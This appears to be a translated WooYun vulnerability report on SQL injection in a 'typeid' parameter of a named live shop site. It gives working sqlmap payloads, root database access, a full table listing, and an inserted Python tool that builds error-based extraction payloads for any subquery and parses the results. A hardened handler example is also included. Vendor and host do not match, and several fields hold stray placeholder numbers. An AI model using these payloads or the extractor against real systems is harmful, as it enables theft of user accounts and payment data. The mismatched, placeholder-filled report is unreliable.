Vulnerability summary

Defect ID: wooyun-2015-0137644

Title: Error-based SQL injection on a 好老师联盟 site (root privileges)

Vendor: hlslm.cn

Author: 路人甲

Submitted: 2015-08-29 23:47

Closed: 2015-09-03 23:48

Disclosed: 2015-09-03 23:48

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: vendor notified, but the vendor ignored the vulnerability

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-08-29: details sent to the vendor, awaiting the vendor's handling
2015-09-03: vendor chose to ignore the vulnerability; details disclosed to the public

Brief description:

121

Details:

Injection point: mall.jzq001.com/plugin.php?id=mall&type=shop_search&classid=1829&sortk=addtime&sortv=desc&typeid=1831
Parameter: typeid
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: typeid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=mall&type=shop_search&classid=1829&sortk=addtime&sortv=desc&typeid=1831 AND 8100=8100

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=mall&type=shop_search&classid=1829&sortk=addtime&sortv=desc&typeid=1831 AND (SELECT 7363 FROM(SELECT COUNT(*),CONCAT(0x71717a7071,(SELECT (ELT(7363=7363,1))),0x71706b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=mall&type=shop_search&classid=1829&sortk=addtime&sortv=desc&typeid=1831 AND (SELECT * FROM (SELECT(SLEEP(5)))STcF)
---
[16:55:05] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.5.22, Apache 2.2.15
back-end DBMS: MySQL 5.0
current user: 'root@localhost'
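The error-based payload above is the classic MySQL FLOOR(RAND(0)*2) duplicate-key trick. In the report it wraps ELT(7363=7363,1), which only yields '1' and serves as sqlmap's detection probe; extraction works by swapping in a subquery such as SELECT USER(), which is how the 'root@localhost' line was obtained. The Python below is an added example, not part of the report and not sqlmap's code: it rebuilds that payload around any scalar subquery and parses the leaked value out of the MySQL error text. The SAMPLE_ERROR string is constructed, since the report shows sqlmap's conclusions rather than the raw error page.

```python
import re
from typing import Optional

# The two marker strings sqlmap wraps around the extracted value, sent as hex
# literals so the request needs no quote characters.
LEFT_MARKER_HEX = "0x71717a7071"   # decodes to 'qqzpq'
RIGHT_MARKER_HEX = "0x71706b7a71"  # decodes to 'qpkzq'

# The error-based payload exactly as the report shows it (typeid suffix only).
PAGE_PAYLOAD = (
    "AND (SELECT 7363 FROM(SELECT COUNT(*),CONCAT(0x71717a7071,"
    "(SELECT (ELT(7363=7363,1))),0x71706b7a71,FLOOR(RAND(0)*2))x "
    "FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
)

# Constructed sample of the MySQL error an application leaks when the payload
# fires with the subquery replaced by SELECT USER(); the report does not show
# the raw error page, so this string is an assumption.
SAMPLE_ERROR = "Duplicate entry 'qqzpqroot@localhostqpkzq1' for key 'group_key'"


def decode_hex_literal(lit: str) -> str:
    """Turn a MySQL 0x... string literal back into text."""
    return bytes.fromhex(lit[2:]).decode("ascii")


def build_error_payload(subquery: str, probe_id: int = 7363) -> str:
    """Rebuild sqlmap's FLOOR(RAND(0)*2) payload around any scalar subquery.

    GROUP BY x makes MySQL evaluate x once to look up the group and again
    when inserting a new group into its temporary table. RAND(0) is seeded,
    so FLOOR(RAND(0)*2) yields the fixed sequence 0,1,1,0,1,1,...: the first
    source row inserts key '...1', the third row looks up '...0', misses,
    re-evaluates to '...1' and hits a duplicate key. MySQL's error message
    quotes the offending key, which is CONCAT(marker, <value>, marker, 1),
    so <value> is echoed back to the client.
    """
    return (
        f"AND (SELECT {probe_id} FROM(SELECT COUNT(*),CONCAT({LEFT_MARKER_HEX},"
        f"({subquery}),{RIGHT_MARKER_HEX},FLOOR(RAND(0)*2))x "
        f"FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
    )


def parse_leaked_value(error_text: str) -> Optional[str]:
    """Extract whatever MySQL echoed between the two markers, or None."""
    left = re.escape(decode_hex_literal(LEFT_MARKER_HEX))
    right = re.escape(decode_hex_literal(RIGHT_MARKER_HEX))
    match = re.search(f"{left}(.*?){right}", error_text, re.DOTALL)
    return match.group(1) if match else None


if __name__ == "__main__":
    print(build_error_payload("SELECT USER()"))
    print(parse_leaked_value(SAMPLE_ERROR))
```

The markers are what make the technique reliable: the application may wrap the MySQL error in its own HTML, but anything between 'qqzpq' and 'qpkzq' is the subquery result and nothing else.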
Database: bbs_52qiuxue
[465 tables] all enumerated:
+----------------------------------+
| group |
| user |
| access |
| active_active_zh |
| active_changeusername |
| active_city_website_hooks |
| active_city_website_push_log |
| active_city_website_setting |
| active_lottery_chance_zh |
| active_lottery_line_zh |
| active_lottery_zh |
| active_questionnaire |
| active_questionnaire_users |
| active_share_qq_log |
| amy_user_setting |
| appbyme_config |
| appbyme_portal_module |
| appbyme_portal_module_source |
| appbyme_user_setting |
| article |
| baidusubmit_setting |
| baidusubmit_sitemap |
| baidusubmit_urlstat |
| class |
| common_admincp_cmenu |
| common_admincp_group |
| common_admincp_member |
| common_admincp_perm |
| common_admincp_session |
| common_admingroup |
| common_adminnote |
| common_advertisement |
| common_advertisement_custom |
| common_banned |
| common_block |
| common_block_favorite |
| common_block_item |
| common_block_item_data |
| common_block_permission |
| common_block_pic |
| common_block_style |
| common_block_xml |
| common_cache |
| common_card |
| common_card_log |
| common_card_type |
| common_connect_guest |
| common_credit_log |
| common_credit_log_field |
| common_credit_rule |
| common_credit_rule_log |
| common_credit_rule_log_field |
| common_cron |
| common_devicetoken |
| common_district |
| common_diy_data |
| common_domain |
| common_failedip |
| common_failedlogin |
| common_friendlink |
| common_grouppm |
| common_invite |
| common_magic |
| common_magiclog |
| common_mailcron |
| common_mailqueue |
| common_member |
| common_member_action_log |
| common_member_connect |
| common_member_count |
| common_member_crime |
| common_member_field_forum |
| common_member_field_home |
| common_member_forum_buylog |
| common_member_grouppm |
| common_member_log |
| common_member_magic |
| common_member_medal |
| common_member_newprompt |
| common_member_profile |
| common_member_profile_bak |
| common_member_profile_setting |
| common_member_security |
| common_member_secwhite |
| common_member_stat_field |
| common_member_status |
| common_member_validate |
| common_member_verify |
| common_member_verify_info |
| common_member_wechat |
| common_member_wechatmp |
| common_myapp |
| common_myinvite |
| common_mytask |
| common_nav |
| common_onlinetime |
| common_optimizer |
| common_patch |
| common_plugin |
| common_plugin_aliyunrec |
| common_plugin_luckypacket |
| common_plugin_luckypacketlog |
| common_pluginvar |
| common_process |
| common_regip |
| common_relatedlink |
| common_remote_port |
| common_report |
| common_searchindex |
| common_seccheck |
| common_secquestion |
| common_session |
| common_setting |
| common_setting2 |
| common_setting_150805 |
| common_setting_150807 |
| common_smiley |
| common_sphinxcounter |
| common_stat |
| common_statuser |
| common_style |
| common_stylevar |
| common_syscache |
| common_tag |
| common_tagitem |
| common_task |
| common_taskvar |
| common_template |
| common_template_block |
| common_template_permission |
| common_uin_black |
| common_usergroup |
| common_usergroup_field |
| common_verifycode |
| common_visit |
| common_word |
| common_word_type |
| connect_disktask |
| connect_feedlog |
| connect_memberbindlog |
| connect_postfeedlog |
| connect_tthreadlog |
| dsu_paulsign |
| dsu_paulsignemot |
| dsu_paulsignset |
| form |
| forum_access |
| forum_activity |
| forum_activityapply |
| forum_announcement |
| forum_attachment |
| forum_attachment_0 |
| forum_attachment_1 |
| forum_attachment_2 |
| forum_attachment_3 |
| forum_attachment_4 |
| forum_attachment_5 |
| forum_attachment_6 |
| forum_attachment_7 |
| forum_attachment_8 |
| forum_attachment_9 |
| forum_attachment_exif |
| forum_attachment_unused |
| forum_attachtype |
| forum_bbcode |
| forum_collection |
| forum_collectioncomment |
| forum_collectionfollow |
| forum_collectioninvite |
| forum_collectionrelated |
| forum_collectionteamworker |
| forum_collectionthread |
| forum_creditslog |
| forum_debate |
| forum_debatepost |
| forum_faq |
| forum_filter_post |
| forum_forum |
| forum_forum_threadtable |
| forum_forumfield |
| forum_forumrecommend |
| forum_groupcreditslog |
| forum_groupfield |
| forum_groupinvite |
| forum_grouplevel |
| forum_groupuser |
| forum_hotreply_member |
| forum_hotreply_number |
| forum_imagetype |
| forum_medal |
| forum_medallog |
| forum_memberrecommend |
| forum_moderator |
| forum_modwork |
| forum_newthread |
| forum_onlinelist |
| forum_order |
| forum_pinggu |
| forum_poll |
| forum_polloption |
| forum_polloption_image |
| forum_pollvoter |
| forum_post |
| forum_post_location |
| forum_post_moderate |
| forum_post_tableid |
| forum_postcache |
| forum_postcomment |
| forum_postlog |
| forum_poststick |
| forum_promotion |
| forum_ratelog |
| forum_relatedthread |
| forum_replycredit |
| forum_rsscache |
| forum_sofa |
| forum_spacecache |
| forum_statlog |
| forum_thread |
| forum_thread_moderate |
| forum_threadaddviews |
| forum_threadcalendar |
| forum_threadclass |
| forum_threadclosed |
| forum_threaddisablepos |
| forum_threadhidelog |
| forum_threadhot |
| forum_threadimage |
| forum_threadlog |
| forum_threadmod |
| forum_threadpartake |
| forum_threadpreview |
| forum_threadprofile |
| forum_threadprofile_group |
| forum_threadrush |
| forum_threadtype |
| forum_trade |
| forum_tradecomment |
| forum_tradelog |
| forum_typeoption |
| forum_typeoptionvar |
| forum_typevar |
| forum_warning |
| group_class |
| group_class_user |
| home_access |
| home_album |
| home_album_category |
| home_appcreditlog |
| home_blacklist |
| home_blog |
| home_blog_category |
| home_blog_moderate |
| home_blogfield |
| home_class |
| home_click |
| home_clickuser |
| home_comment |
| home_comment_moderate |
| home_docomment |
| home_doing |
| home_doing_moderate |
| home_favorite |
| home_feed |
| home_feed_app |
| home_follow |
| home_follow_feed |
| home_follow_feed_archiver |
| home_friend |
| home_friend_request |
| home_friendlog |
| home_notification |
| home_pic |
| home_pic_moderate |
| home_picfield |
| home_poke |
| home_pokearchive |
| home_share |
| home_share_moderate |
| home_show |
| home_specialuser |
| home_surrounding_user |
| home_userapp |
| home_userappfield |
| home_visitor |
| lev_login_auth_user |
| lev_open_auth_user |
| lev_open_login_user |
| log |
| mall_address |
| mall_advertsion |
| mall_advertsionswf |
| mall_down_15 |
| mall_down_data_15 |
| mall_favorite |
| mall_fields |
| mall_list |
| mall_order |
| mall_relation |
| mall_shopping |
| mall_withdata |
| mobile_setting |
| mobile_wechat_authcode |
| mobile_wechat_masssend |
| mobile_wechat_resource |
| mobile_wsq_threadlist |
| moodwall |
| myrepeats |
| node |
| node_operation |
| plugin_admincp_per |
| plugin_auction |
| plugin_auction_message |
| plugin_auction_xml |
| plugin_auctionapply |
| plugin_blessing |
| plugin_formmanage_formlist |
| portal_article_content |
| portal_article_count |
| portal_article_moderate |
| portal_article_related |
| portal_article_title |
| portal_article_trash |
| portal_attachment |
| portal_category |
| portal_category_permission |
| portal_comment |
| portal_comment_moderate |
| portal_rsscache |
| portal_topic |
| portal_topic_pic |
| resource_auth_group |
| resource_auth_group_user |
| role |
| role_user |
| role_user_copy |
| security_evilpost |
| security_eviluser |
| security_failedlog |
| sms_recv |
| sms_send |
| teacher_admin_log |
| teacher_area |
| teacher_artice |
| teacher_article |
| teacher_auditiondata |
| teacher_auditionlog |
| teacher_auth_base |
| teacher_auth_class |
| teacher_auth_courses |
| teacher_auth_experience |
| teacher_auth_index |
| teacher_auth_info |
| teacher_auth_log |
| teacher_auth_success_case |
| teacher_china |
| teacher_collect |
| teacher_comment |
| teacher_commission_log |
| teacher_consumption |
| teacher_course_1 |
| teacher_course_register |
| teacher_course_time_1 |
| teacher_course_type_1 |
| teacher_courses |
| teacher_courses_copy |
| teacher_customer_call_log |
| teacher_detail |
| teacher_experience |
| teacher_fund_log |
| teacher_main |
| teacher_member_bak |
| teacher_member_profile_bak |
| teacher_message_reminder |
| teacher_need |
| teacher_need_accept |
| teacher_need_copy |
| teacher_need_log |
| teacher_need_order_detaill |
| teacher_need_status |
| teacher_order |
| teacher_orders_1 |
| teacher_parm |
| teacher_pay_log |
| teacher_points |
| teacher_proportion_rules |
| teacher_propotion_isopen |
| teacher_qrcode |
| teacher_qrcode_group |
| teacher_resources_manage |
| teacher_send_sms_log |
| teacher_sign |
| teacher_sign_log |
| teacher_student_base |
| teacher_student_class_feedback |
| teacher_student_contact |
| teacher_student_sign_feedback |
| teacher_success_case |
| teacher_teacher_base |
| teacher_teacher_comment |
| teacher_teacher_extend |
| teacher_teacher_inside_comment |
| teacher_tp_admin_log |
| teacher_tp_appointment |
| teacher_tp_appointment_copy |
| teacher_tp_area |
| teacher_tp_index |
| teacher_tp_pay_log |
| teacher_tp_type |
| teacher_tp_user_comments |
| teacher_tp_user_false_data |
| teacher_tp_user_false_parm |
| teacher_tp_user_feedback |
| teacher_umemberfields_bak |
| teacher_umembers_bak |
| teacher_user_comment |
| teacher_wechat_audition_send_log |
| teacher_wechat_send_log |
| teacher_wrong_log |
| teacher_wxvote |
| teacher_wxvote_people |
| teachers_teachers_extends |
| ucenter_admins |
| ucenter_amy_pm_heart |
| ucenter_applications |
| ucenter_badwords |
| ucenter_domains |
| ucenter_failedlogins |
| ucenter_feeds |
| ucenter_friends |
| ucenter_mailqueue |
| ucenter_memberfields |
| ucenter_members |
| ucenter_members_150813 |
| ucenter_members_copy |
| ucenter_members_copy1 |
| ucenter_mergemembers |
| ucenter_newpm |
| ucenter_notelist |
| ucenter_pm_indexes |
| ucenter_pm_lists |
| ucenter_pm_members |
| ucenter_pm_messages_0 |
| ucenter_pm_messages_1 |
| ucenter_pm_messages_2 |
| ucenter_pm_messages_3 |
| ucenter_pm_messages_4 |
| ucenter_pm_messages_5 |
| ucenter_pm_messages_6 |
| ucenter_pm_messages_7 |
| ucenter_pm_messages_8 |
| ucenter_pm_messages_9 |
| ucenter_protectedmembers |
| ucenter_settings |
| ucenter_sqlcache |
| ucenter_tags |
| ucenter_vars |
| wechat_log |
| weixin_binding |
| weixin_http_log |
| weixin_log |
| weixin_parm |
| weixin_push |
| weixin_qiye_log |
| will_log |
How much damage could this do? The query runs as root@localhost, so every one of the 465 tables above is readable, among them the account stores (ucenter_members, common_member), order and payment records (mall_order, teacher_pay_log, teacher_fund_log) and the SMS and WeChat send logs (sms_send, teacher_send_sms_log, teacher_wechat_send_log).

Proof of concept:

121

Fix recommendation:

12
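The report's fix section is empty. As an added example, not the vendor's code (the mall_list table, its columns and the sample rows are assumptions standing in for the listing table behind plugin.php?id=mall), here is the string-building pattern that produces this class of bug beside a hardened handler, with a sqlmap-style boolean probe run against both to show why the second one is no longer detectable. sqlite3 stands in for MySQL; the boolean-blind behaviour is the same.

```python
import sqlite3
from typing import Callable, List, Tuple

# Constructed stand-in for the shop listing table behind plugin.php?id=mall;
# table name, columns and rows are assumptions, not the vendor's schema.
SAMPLE_ROWS = [
    (1, 1829, 1831, "Maths tutoring, one-to-one", "2015-08-01"),
    (2, 1829, 1831, "Physics exam preparation", "2015-08-02"),
    (3, 1829, 1832, "English conversation", "2015-08-03"),
]

# ORDER BY cannot take bound parameters, so sortk/sortv are allowlisted instead.
SORT_COLUMNS = {"addtime", "id"}
SORT_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}

Row = Tuple[int, str]
Search = Callable[[str, str, str, str], List[Row]]


def _db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE mall_list (id INTEGER, classid INTEGER, typeid INTEGER, "
                "title TEXT, addtime TEXT)")
    con.executemany("INSERT INTO mall_list VALUES (?, ?, ?, ?, ?)", SAMPLE_ROWS)
    return con


def shop_search_vulnerable(classid: str, typeid: str, sortk: str, sortv: str) -> List[Row]:
    """The pattern behind the finding: query-string values pasted straight into SQL."""
    sql = (f"SELECT id, title FROM mall_list WHERE classid = {classid} AND typeid = {typeid} "
           f"ORDER BY {sortk} {sortv}")
    return _db().execute(sql).fetchall()


def shop_search_fixed(classid: str, typeid: str, sortk: str, sortv: str) -> List[Row]:
    """Hardened handler: numeric inputs are cast then bound; sort inputs are allowlisted."""
    cid, tid = int(classid), int(typeid)   # ValueError on anything but a plain integer
    column = sortk if sortk in SORT_COLUMNS else "addtime"
    direction = SORT_DIRECTIONS.get(sortv.lower(), "DESC")
    sql = (f"SELECT id, title FROM mall_list WHERE classid = ? AND typeid = ? "
           f"ORDER BY {column} {direction}")
    return _db().execute(sql, (cid, tid)).fetchall()


def blind_oracle(search: Search, typeid: str = "1831") -> bool:
    """sqlmap-style boolean probe: append a true and a false condition to typeid and
    compare with the untouched request. Returns True when the handler is injectable."""
    try:
        baseline = search("1829", typeid, "addtime", "desc")
        true_branch = search("1829", f"{typeid} AND 8100=8100", "addtime", "desc")
        false_branch = search("1829", f"{typeid} AND 8100=8101", "addtime", "desc")
    except ValueError:
        return False  # the fixed handler rejects the probe before it reaches SQL
    return true_branch == baseline and false_branch != baseline


if __name__ == "__main__":
    print("vulnerable handler injectable:", blind_oracle(shop_search_vulnerable))
    print("fixed handler injectable:", blind_oracle(shop_search_fixed))
```

Note that binding alone does not cover the sortk and sortv parameters in the original URL: ORDER BY column names and directions cannot be bound, so they must be compared against a fixed allowlist, as shop_search_fixed does, rather than escaped.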

Copyright notice: when reposting, credit the source as 路人甲@乌云


Responses

Vendor response:

Severity: no impact, vendor ignored

Ignored on: 2015-09-03 23:48

Vendor reply:

Rank: 4 (WooYun assessment)

Latest status:

None